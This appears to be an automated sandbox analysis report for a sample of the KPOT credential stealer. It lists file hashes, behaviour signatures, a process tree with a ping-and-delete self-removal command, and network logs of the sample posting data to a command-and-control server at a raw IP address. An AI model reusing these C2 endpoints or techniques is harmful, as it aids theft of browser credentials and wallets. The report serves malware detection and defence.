Overview

overview

10

Static

static

dc02167cff...0c.exe

windows7_x64

10

dc02167cff...0c.exe

windows10_x64

10

Analysis

  • max time kernel
    126s
  • max time network
    129s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    07/07/2020, 18:05 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dc02167cff131c6e6c0a2801f1eb3b0c.exe

  • Size

    399KB

  • MD5

    dc02167cff131c6e6c0a2801f1eb3b0c

  • SHA1

    20d395af135774018632b34dd6987ebfe43db43d

  • SHA256

    dc68a0a13aa0a1bf5394dd04e59ef2916f0b31a964730a17b0ff4afeac5888dc

  • SHA512

    438864813274ec6a5a9350391994de17512d957eccd4ffb4d7113e15e69e3c5171d94eb90c0081ac05c1a616ffe53999fd5bc46dda242847b4dcd7eaa1837362

Score
10/10
kpotdiscoveryspywarestealertrojan

Malware Config

Signatures

  • KPOT

    KPOT is an information stealer that steals user data and account credentials.

    trojanstealerkpot
  • KPOT Core Executable 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Program crash 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dc02167cff131c6e6c0a2801f1eb3b0c.exe
    "C:\Users\Admin\AppData\Local\Temp\dc02167cff131c6e6c0a2801f1eb3b0c.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      "C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1916
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:3708
    • C:\Windows\SysWOW64\regedit.exe
      "C:\Windows\System32\regedit.exe" \s C:\Windows\wotsuper.reg
      2⤵
      • Runs .reg file with regedit
      PID:2572
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1736
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1736 -s 3404
      2⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Program crash
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:416
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:496

Network

  • flag-unknown
    DNS
    iplogger.org
    Remote address:
    8.8.8.8:53
    Request
    iplogger.org
    IN A
    Response
    iplogger.org
    IN A
    88.99.66.31
  • flag-unknown
    GET
    http://89.249.67.27/bUjyAvgAIgcicUbB
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    GET /bUjyAvgAIgcicUbB HTTP/1.1
    Connection: Keep-Alive
    Host: 89.249.67.27
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:01 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 348
    Connection: keep-alive
    Location: http://89.249.67.27/bUjyAvgAIgcicUbB/
  • flag-unknown
    GET
    http://89.249.67.27/bUjyAvgAIgcicUbB/
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    GET /bUjyAvgAIgcicUbB/ HTTP/1.1
    Connection: Keep-Alive
    Host: 89.249.67.27
    Response
    HTTP/1.1 302 Found
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: keep-alive
    X-Powered-By: PHP/5.6.28
    Set-Cookie: PHPSESSID=5oum76km3vlk2qosbce8r2fft2; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
  • flag-unknown
    GET
    http://89.249.67.27/bUjyAvgAIgcicUbB/login.php
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    GET /bUjyAvgAIgcicUbB/login.php HTTP/1.1
    Connection: Keep-Alive
    Host: 89.249.67.27
    Cookie: PHPSESSID=5oum76km3vlk2qosbce8r2fft2
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:01 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 231
    Connection: keep-alive
    X-Powered-By: PHP/5.6.28
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
  • flag-unknown
    GET
    http://89.249.67.27/bUjyAvgAIgcicUbB/util.php?id=BB751A70FD7F2148772887
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    GET /bUjyAvgAIgcicUbB/util.php?id=BB751A70FD7F2148772887 HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 89.249.67.27
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:03 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4992
    Connection: keep-alive
    X-Powered-By: PHP/5.6.28
  • flag-unknown
    POST
    http://89.249.67.27/bUjyAvgAIgcicUbB/util.php
    wotsuper.exe
    Remote address:
    89.249.67.27:80
    Request
    POST /bUjyAvgAIgcicUbB/util.php HTTP/1.1
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Host: 89.249.67.27
    Content-Length: 197781
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.6.2
    Date: Wed, 08 Jul 2020 10:05:09 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 2
    Connection: keep-alive
    X-Powered-By: PHP/5.6.28
  • flag-unknown
    GET
    http://www.msftconnecttest.com/connecttest.txt
    WerFault.exe
    Remote address:
    13.107.4.52:80
    Request
    GET /connecttest.txt HTTP/1.1
    Connection: Keep-Alive
    Host: www.msftconnecttest.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store
    Content-Length: 22
    Content-Type: text/plain; charset=utf-8
    Last-Modified: Thu, 02 Jul 2020 02:48:07 GMT
    Accept-Ranges: bytes
    ETag: 0x8D343F9E96C9DAC
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: X-MSEdge-Ref
    Timing-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-MSEdge-Ref: Ref A: BC3A8E309618491FAB24C5415A6208CB Ref B: AMSEDGE0911 Ref C: 2020-07-07T18:05:15Z
    Date: Tue, 07 Jul 2020 18:05:14 GMT
  • flag-unknown
    GET
    http://www.msftconnecttest.com/connecttest.txt
    WerFault.exe
    Remote address:
    13.107.4.52:80
    Request
    GET /connecttest.txt HTTP/1.1
    Connection: Keep-Alive
    Host: www.msftconnecttest.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store
    Content-Length: 22
    Content-Type: text/plain; charset=utf-8
    Last-Modified: Thu, 02 Jul 2020 02:48:07 GMT
    Accept-Ranges: bytes
    ETag: 0x8D343F9E96C9DAC
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: X-MSEdge-Ref
    Timing-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-MSEdge-Ref: Ref A: 7A0C6D686932476A85029AF756032DDA Ref B: AMSEDGE0911 Ref C: 2020-07-07T18:05:15Z
    Date: Tue, 07 Jul 2020 18:05:14 GMT
  • flag-unknown
    DNS
    watson.telemetry.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    watson.telemetry.microsoft.com
    IN A
    Response
    watson.telemetry.microsoft.com
    IN CNAME
    umwatson.trafficmanager.net
    umwatson.trafficmanager.net
    IN A
    52.184.221.185
  • flag-unknown
    POST
    https://watson.telemetry.microsoft.com/Telemetry.Request
    WerFault.exe
    Remote address:
    52.184.221.185:443
    Request
    POST /Telemetry.Request HTTP/1.1
    Connection: Keep-Alive
    User-Agent: MSDW
    MSA_DeviceTicket: t=EwCwAlN5BAAUK0sX2thGrPpoZPl1jsVtu9HziUMAAbUMSTQP/DtwLypdfAmg/xCANhmxwpmfjRnHvJxThPlchm8JIOjNsgLeK34jVjd5cNR+qHeNYBbOMoJnEhUB+I51qolK1j6S6+HrhJdlFoqYves1DmimJR2d35yIct8d56a0LQYjz5FoQ+ZByBFBa5o03XeYzZ5oMYgLtDNFE5sxVnQn398EOMCPm0RgJB6M13jHFylrf4EkRxcQzTZBgHiMB+W9cSgSrgNeI5qsvfoLj5FxkS6hpel7VCXxcPqPoqd8gVN+RkGRMHj6UDQnRTgpdqrbJU03oLWxbHXIM1V72H5vzUb74e5RPY1JJ8xa4KMJfzHainITnA9N1XvTPj0DZgAACJY9NuHlpxg1gAGIzImvnb/HTU/JyTQQS5G+8XJTiwVje8BiMX3/eVBwSpq3x0Yg/BdUAi9tUy1FRvTNDrfHYmQm/Lx8sx5KwQvDEsaQYLskw/qg2p4nnrENaW54KRMaUR/6Tx2UzitB4LUWUap1cQf6SJi1BMNusUI6M4tStlbQVZXJIiqWcHBa/4mzNqK+8cSxK1IRmncDVAidAJTMSgSMpXwn3KZDa7D1uFhLP93DFbO6MSxpm0EzkWyfAraHXUQOxujitOck6NoxFS+7jujnfoYHvHFJi5xZ2/4/KnjKqIt2FD5aWpgmZbLzf48sOyw8KwwdMrmhKXK92JZgROIpCnC/XovsWxq8UoKK4xYMYYO8NzQspOkXD8tJroY9O/dF/5CWZHQ5C9YWuS4ywnssoARTxJ9Y/6LbIq6c6qGEnzmoHT4ZfSBPK+Zle4MS7QvVh+A03WyvWC5LFmEjMmqetx4CAupaROVJwuhUiYaalsrMOY0Kk4R3q5hq2SaPptT489+ZYy6eyp+0AQ==&p=
    AAD_TenantId: (null)
    Content-Length: 4700
    Host: watson.telemetry.microsoft.com
    Response
    HTTP/1.1 200 200 OK
    Content-Length: 1214
    Content-Type: text/xml
    Date: Tue, 07 Jul 2020 18:05:16 GMT
  • flag-unknown
    POST
    https://watson.telemetry.microsoft.com/Telemetry.Request
    WerFault.exe
    Remote address:
    52.184.221.185:443
    Request
    POST /Telemetry.Request HTTP/1.1
    Connection: Keep-Alive
    User-Agent: MSDW
    MSA_DeviceTicket: t=EwCwAlN5BAAUK0sX2thGrPpoZPl1jsVtu9HziUMAAbUMSTQP/DtwLypdfAmg/xCANhmxwpmfjRnHvJxThPlchm8JIOjNsgLeK34jVjd5cNR+qHeNYBbOMoJnEhUB+I51qolK1j6S6+HrhJdlFoqYves1DmimJR2d35yIct8d56a0LQYjz5FoQ+ZByBFBa5o03XeYzZ5oMYgLtDNFE5sxVnQn398EOMCPm0RgJB6M13jHFylrf4EkRxcQzTZBgHiMB+W9cSgSrgNeI5qsvfoLj5FxkS6hpel7VCXxcPqPoqd8gVN+RkGRMHj6UDQnRTgpdqrbJU03oLWxbHXIM1V72H5vzUb74e5RPY1JJ8xa4KMJfzHainITnA9N1XvTPj0DZgAACJY9NuHlpxg1gAGIzImvnb/HTU/JyTQQS5G+8XJTiwVje8BiMX3/eVBwSpq3x0Yg/BdUAi9tUy1FRvTNDrfHYmQm/Lx8sx5KwQvDEsaQYLskw/qg2p4nnrENaW54KRMaUR/6Tx2UzitB4LUWUap1cQf6SJi1BMNusUI6M4tStlbQVZXJIiqWcHBa/4mzNqK+8cSxK1IRmncDVAidAJTMSgSMpXwn3KZDa7D1uFhLP93DFbO6MSxpm0EzkWyfAraHXUQOxujitOck6NoxFS+7jujnfoYHvHFJi5xZ2/4/KnjKqIt2FD5aWpgmZbLzf48sOyw8KwwdMrmhKXK92JZgROIpCnC/XovsWxq8UoKK4xYMYYO8NzQspOkXD8tJroY9O/dF/5CWZHQ5C9YWuS4ywnssoARTxJ9Y/6LbIq6c6qGEnzmoHT4ZfSBPK+Zle4MS7QvVh+A03WyvWC5LFmEjMmqetx4CAupaROVJwuhUiYaalsrMOY0Kk4R3q5hq2SaPptT489+ZYy6eyp+0AQ==&p=
    AAD_TenantId: (null)
    Content-Length: 502526
    Host: watson.telemetry.microsoft.com
    Response
    HTTP/1.1 200 200 OK
    Content-Length: 881
    Content-Type: text/xml
    Date: Tue, 07 Jul 2020 18:05:18 GMT
  • 89.249.67.27:80
    http://89.249.67.27/bUjyAvgAIgcicUbB/login.php
    http
    wotsuper.exe
    601 B
     1.8kB
     7
    7

    HTTP Request

    GET http://89.249.67.27/bUjyAvgAIgcicUbB

    HTTP Response

    301

    HTTP Request

    GET http://89.249.67.27/bUjyAvgAIgcicUbB/

    HTTP Response

    302

    HTTP Request

    GET http://89.249.67.27/bUjyAvgAIgcicUbB/login.php

    HTTP Response

    200
  • 89.249.67.27:80
    http://89.249.67.27/bUjyAvgAIgcicUbB/util.php
    http
    wotsuper.exe
    204.1kB
     10.9kB
     146
    137

    HTTP Request

    GET http://89.249.67.27/bUjyAvgAIgcicUbB/util.php?id=BB751A70FD7F2148772887

    HTTP Response

    200

    HTTP Request

    POST http://89.249.67.27/bUjyAvgAIgcicUbB/util.php

    HTTP Response

    200
  • 13.107.4.52:80
    http://www.msftconnecttest.com/connecttest.txt
    http
    WerFault.exe
    446 B
     1.2kB
     6
    5

    HTTP Request

    GET http://www.msftconnecttest.com/connecttest.txt

    HTTP Response

    200

    HTTP Request

    GET http://www.msftconnecttest.com/connecttest.txt

    HTTP Response

    200
  • 52.184.221.185:443
    https://watson.telemetry.microsoft.com/Telemetry.Request
    tls, http
    WerFault.exe
    6.8kB
     5.7kB
     12
    10

    HTTP Request

    POST https://watson.telemetry.microsoft.com/Telemetry.Request

    HTTP Response

    200
  • 52.184.221.185:443
    https://watson.telemetry.microsoft.com/Telemetry.Request
    tls, http
    WerFault.exe
    526.7kB
     14.4kB
     369
    183

    HTTP Request

    POST https://watson.telemetry.microsoft.com/Telemetry.Request

    HTTP Response

    200
  • 8.8.8.8:53
    iplogger.org
    dns
    58 B
     74 B
     1
    1

    DNS Request

    iplogger.org

    DNS Response

    88.99.66.31

  • 8.8.8.8:53
    watson.telemetry.microsoft.com
    dns
    76 B
     133 B
     1
    1

    DNS Request

    watson.telemetry.microsoft.com

    DNS Response

    52.184.221.185

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/416-10-0x000001E26B620000-0x000001E26B621000-memory.dmp

    Filesize

    4KB

    Download

  • memory/416-7-0x000001E26A5C0000-0x000001E26A5C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/416-8-0x000001E26A5C0000-0x000001E26A5C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/416-13-0x000001E26BA20000-0x000001E26BA21000-memory.dmp

    Filesize

    4KB

    Download

  • memory/416-15-0x000001E26B760000-0x000001E26B761000-memory.dmp

    Filesize

    4KB

    Download

  • memory/416-16-0x000001E26B560000-0x000001E26B561000-memory.dmp

    Filesize

    4KB

    Download

  • memory/416-21-0x000001E26B510000-0x000001E26B511000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1528-4-0x0000000000600000-0x0000000000620000-memory.dmp

    Filesize

    128KB

    Download

  • memory/1528-6-0x00000000020C0000-0x00000000020DE000-memory.dmp

    Filesize

    120KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.